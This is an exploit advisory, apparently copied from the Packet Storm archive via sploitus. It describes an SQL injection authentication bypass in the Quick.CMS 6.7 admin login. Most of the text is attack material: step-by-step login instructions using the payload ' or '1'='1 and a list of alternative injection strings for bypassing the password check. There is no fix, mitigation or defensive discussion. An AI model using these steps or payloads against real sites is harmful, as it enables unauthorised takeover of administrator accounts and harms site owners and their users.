Share
## https://sploitus.com/exploit?id=PACKETSTORM:177657
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass  
# Google Dork: N/A  
# Date: 02-03-2024  
# Exploit Author: ./H4X.Forensics - Diyar  
# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>  
# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]  
# Version: 6.7  
# Tested on: Windows  
# CVE : N/A  
  
How to exploit :  
  
*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php  
*--> Enter any Email like : root@root.com<mailto:root@root.com>  
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1  
*--> Tick the Checkbox  
*--> Press Login  
*--> Congratz!  
  
*--> SQL Injection Authentication Bypass Payload : ' or '1'='1  
  
*--> Payloads Can be use :  
  
' or '1'='1  
' or ''='  
' or 1]%00  
' or /* or '  
' or "a" or '  
' or 1 or '  
' or true() or '